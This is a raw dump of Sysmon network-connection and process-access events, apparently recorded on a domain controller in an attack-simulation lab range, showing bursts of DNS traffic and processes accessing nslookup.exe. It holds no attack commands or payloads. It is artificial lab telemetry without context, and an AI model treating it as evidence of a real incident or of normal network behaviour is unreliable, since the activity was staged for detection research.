354300x8000000000000000207679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.599{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50553- 354300x8000000000000000207678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.599{00000000-0000-0000-0000-000000000000}6576<unknown process>-udptruefalse127.0.0.1-50553-false127.0.0.1-53domain 354300x8000000000000000207677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.599{00000000-0000-0000-0000-000000000000}6576<unknown process>-udpfalsefalse127.0.0.1-50552-false127.0.0.1-53domain 354300x8000000000000000207676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.599{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50552- 354300x8000000000000000207675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.599{00000000-0000-0000-0000-000000000000}6576<unknown process>-udptruefalse127.0.0.1-50552-false127.0.0.1-53domain 354300x8000000000000000207674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.598{00000000-0000-0000-0000-000000000000}6576<unknown process>-udpfalsefalse127.0.0.1-50551-false127.0.0.1-53domain 354300x8000000000000000207673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.598{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50551- 354300x8000000000000000207672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.598{00000000-0000-0000-0000-000000000000}6576<unknown process>-udptruefalse127.0.0.1-50551-false127.0.0.1-53domain 354300x8000000000000000207671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.520{00000000-0000-0000-0000-000000000000}4832<unknown process>-udpfalsefalse127.0.0.1-50550-false127.0.0.1-53domain 354300x8000000000000000207670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.520{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50550- 354300x8000000000000000207669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.519{00000000-0000-0000-0000-000000000000}4832<unknown process>-udptruefalse127.0.0.1-50550-false127.0.0.1-53domain 354300x8000000000000000207668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.450{00000000-0000-0000-0000-000000000000}2104<unknown process>-udpfalsefalse127.0.0.1-50549-false127.0.0.1-53domain 354300x8000000000000000207667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.450{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50549- 354300x8000000000000000207666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.450{00000000-0000-0000-0000-000000000000}2104<unknown process>-udptruefalse127.0.0.1-50549-false127.0.0.1-53domain 354300x8000000000000000207665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.450{00000000-0000-0000-0000-000000000000}2104<unknown process>-udpfalsefalse127.0.0.1-50548-false127.0.0.1-53domain 354300x8000000000000000207664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.450{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50548- 354300x8000000000000000207663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.450{00000000-0000-0000-0000-000000000000}2104<unknown process>-udptruefalse127.0.0.1-50548-false127.0.0.1-53domain 354300x8000000000000000207662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.450{00000000-0000-0000-0000-000000000000}2104<unknown process>-udpfalsefalse127.0.0.1-50547-false127.0.0.1-53domain 354300x8000000000000000207661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.450{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50547- 354300x8000000000000000207660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.450{00000000-0000-0000-0000-000000000000}2104<unknown process>-udptruefalse127.0.0.1-50547-false127.0.0.1-53domain 354300x8000000000000000207659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.375{00000000-0000-0000-0000-000000000000}7632<unknown process>-udpfalsefalse127.0.0.1-50546-false127.0.0.1-53domain 354300x8000000000000000207658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.375{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local63140-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.373{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local63140-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.373{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50546- 354300x8000000000000000207655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.373{00000000-0000-0000-0000-000000000000}7632<unknown process>-udptruefalse127.0.0.1-50546-false127.0.0.1-53domain 354300x8000000000000000207654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.373{00000000-0000-0000-0000-000000000000}7632<unknown process>-udpfalsefalse127.0.0.1-50545-false127.0.0.1-53domain 354300x8000000000000000207653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.373{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50545- 354300x8000000000000000207652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.373{00000000-0000-0000-0000-000000000000}7632<unknown process>-udptruefalse127.0.0.1-50545-false127.0.0.1-53domain 354300x8000000000000000207651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.372{00000000-0000-0000-0000-000000000000}7632<unknown process>-udpfalsefalse127.0.0.1-50544-false127.0.0.1-53domain 354300x8000000000000000207650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.372{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50544- 354300x8000000000000000207649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.372{00000000-0000-0000-0000-000000000000}7632<unknown process>-udptruefalse127.0.0.1-50544-false127.0.0.1-53domain 354300x8000000000000000207648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.310{00000000-0000-0000-0000-000000000000}6408<unknown process>-udpfalsefalse127.0.0.1-50543-false127.0.0.1-53domain 354300x8000000000000000207647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.310{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50543- 354300x8000000000000000207646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.310{00000000-0000-0000-0000-000000000000}6408<unknown process>-udptruefalse127.0.0.1-50543-false127.0.0.1-53domain 354300x8000000000000000207645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.310{00000000-0000-0000-0000-000000000000}6408<unknown process>-udpfalsefalse127.0.0.1-50542-false127.0.0.1-53domain 354300x8000000000000000207644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.310{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50542- 354300x8000000000000000207643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.310{00000000-0000-0000-0000-000000000000}6408<unknown process>-udptruefalse127.0.0.1-50542-false127.0.0.1-53domain 354300x8000000000000000207642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.310{00000000-0000-0000-0000-000000000000}6408<unknown process>-udpfalsefalse127.0.0.1-50541-false127.0.0.1-53domain 354300x8000000000000000207641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.309{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50541- 354300x8000000000000000207640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.309{00000000-0000-0000-0000-000000000000}6408<unknown process>-udptruefalse127.0.0.1-50541-false127.0.0.1-53domain 354300x8000000000000000207639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.242{00000000-0000-0000-0000-000000000000}7380<unknown process>-udpfalsefalse127.0.0.1-50540-false127.0.0.1-53domain 354300x8000000000000000207638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.242{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62250-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.241{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62250-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.241{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50540- 354300x8000000000000000207635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.241{00000000-0000-0000-0000-000000000000}7380<unknown process>-udptruefalse127.0.0.1-50540-false127.0.0.1-53domain 354300x8000000000000000207634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.241{00000000-0000-0000-0000-000000000000}7380<unknown process>-udpfalsefalse127.0.0.1-50539-false127.0.0.1-53domain 354300x8000000000000000207633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.241{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50539- 354300x8000000000000000207632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.241{00000000-0000-0000-0000-000000000000}7380<unknown process>-udptruefalse127.0.0.1-50539-false127.0.0.1-53domain 354300x8000000000000000207631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.241{00000000-0000-0000-0000-000000000000}7380<unknown process>-udpfalsefalse127.0.0.1-50538-false127.0.0.1-53domain 354300x8000000000000000207630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.240{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50538- 354300x8000000000000000207629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.240{00000000-0000-0000-0000-000000000000}7380<unknown process>-udptruefalse127.0.0.1-50538-false127.0.0.1-53domain 354300x8000000000000000207628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.158{00000000-0000-0000-0000-000000000000}4776<unknown process>-udpfalsefalse127.0.0.1-50537-false127.0.0.1-53domain 354300x8000000000000000207627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.157{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50537- 354300x8000000000000000207626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.157{00000000-0000-0000-0000-000000000000}4776<unknown process>-udptruefalse127.0.0.1-50537-false127.0.0.1-53domain 354300x8000000000000000207625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.157{00000000-0000-0000-0000-000000000000}4776<unknown process>-udpfalsefalse127.0.0.1-50536-false127.0.0.1-53domain 354300x8000000000000000207624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.157{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50536- 354300x8000000000000000207623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.157{00000000-0000-0000-0000-000000000000}4776<unknown process>-udptruefalse127.0.0.1-50536-false127.0.0.1-53domain 354300x8000000000000000207622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.157{00000000-0000-0000-0000-000000000000}4776<unknown process>-udpfalsefalse127.0.0.1-50535-false127.0.0.1-53domain 354300x8000000000000000207621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.157{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50535- 354300x8000000000000000207620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.157{00000000-0000-0000-0000-000000000000}4776<unknown process>-udptruefalse127.0.0.1-50535-false127.0.0.1-53domain 354300x8000000000000000207619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.062{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50534- 354300x8000000000000000207618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.062{00000000-0000-0000-0000-000000000000}7532<unknown process>-udptruefalse127.0.0.1-50534-false127.0.0.1-53domain 354300x8000000000000000207617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.985{00000000-0000-0000-0000-000000000000}896<unknown process>-udpfalsefalse127.0.0.1-50533-false127.0.0.1-53domain 354300x8000000000000000207616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.985{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50533- 354300x8000000000000000207615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.985{00000000-0000-0000-0000-000000000000}896<unknown process>-udptruefalse127.0.0.1-50533-false127.0.0.1-53domain 354300x8000000000000000207614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.985{00000000-0000-0000-0000-000000000000}896<unknown process>-udpfalsefalse127.0.0.1-50532-false127.0.0.1-53domain 354300x8000000000000000207613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.985{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50532- 354300x8000000000000000207612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.985{00000000-0000-0000-0000-000000000000}896<unknown process>-udptruefalse127.0.0.1-50532-false127.0.0.1-53domain 354300x8000000000000000207611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.984{00000000-0000-0000-0000-000000000000}896<unknown process>-udpfalsefalse127.0.0.1-50531-false127.0.0.1-53domain 354300x8000000000000000207610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.984{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50531- 354300x8000000000000000207609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.916{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61802-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.915{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61802-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.915{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50530- 354300x8000000000000000207606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.915{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50529- 354300x8000000000000000207605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.915{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50528- 354300x8000000000000000207604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.845{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56423-false10.0.1.12-8000- 354300x8000000000000000207603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.839{00000000-0000-0000-0000-000000000000}5044<unknown process>-udpfalsefalse127.0.0.1-50527-false127.0.0.1-53domain 354300x8000000000000000207602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.839{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50527- 354300x8000000000000000207601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.839{00000000-0000-0000-0000-000000000000}5044<unknown process>-udptruefalse127.0.0.1-50527-false127.0.0.1-53domain 354300x8000000000000000207600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.839{00000000-0000-0000-0000-000000000000}5044<unknown process>-udpfalsefalse127.0.0.1-50526-false127.0.0.1-53domain 354300x8000000000000000207599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.839{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50526- 354300x8000000000000000207598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.839{00000000-0000-0000-0000-000000000000}5044<unknown process>-udptruefalse127.0.0.1-50526-false127.0.0.1-53domain 354300x8000000000000000207597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.839{00000000-0000-0000-0000-000000000000}5044<unknown process>-udpfalsefalse127.0.0.1-50525-false127.0.0.1-53domain 354300x8000000000000000207596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.839{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50525- 354300x8000000000000000207595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.838{00000000-0000-0000-0000-000000000000}5044<unknown process>-udptruefalse127.0.0.1-50525-false127.0.0.1-53domain 354300x8000000000000000207594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.781{00000000-0000-0000-0000-000000000000}7340<unknown process>-udpfalsefalse127.0.0.1-50524-false127.0.0.1-53domain 354300x8000000000000000207593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.781{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61893-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.779{00000000-0000-0000-0000-000000000000}7340<unknown process>-udptruefalse127.0.0.1-50524-false127.0.0.1-53domain 354300x8000000000000000207591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.718{00000000-0000-0000-0000-000000000000}4936<unknown process>-udpfalsefalse127.0.0.1-50521-false127.0.0.1-53domain 354300x8000000000000000207590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.717{00000000-0000-0000-0000-000000000000}4936<unknown process>-udpfalsefalse127.0.0.1-50520-false127.0.0.1-53domain 10341000x8000000000000000207589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.057{2E1864BB-18E8-629A-1943-000000005F02}61767996C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-1A43-000000005F02}1188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.057{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.057{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-1A43-000000005F02}1188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.057{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 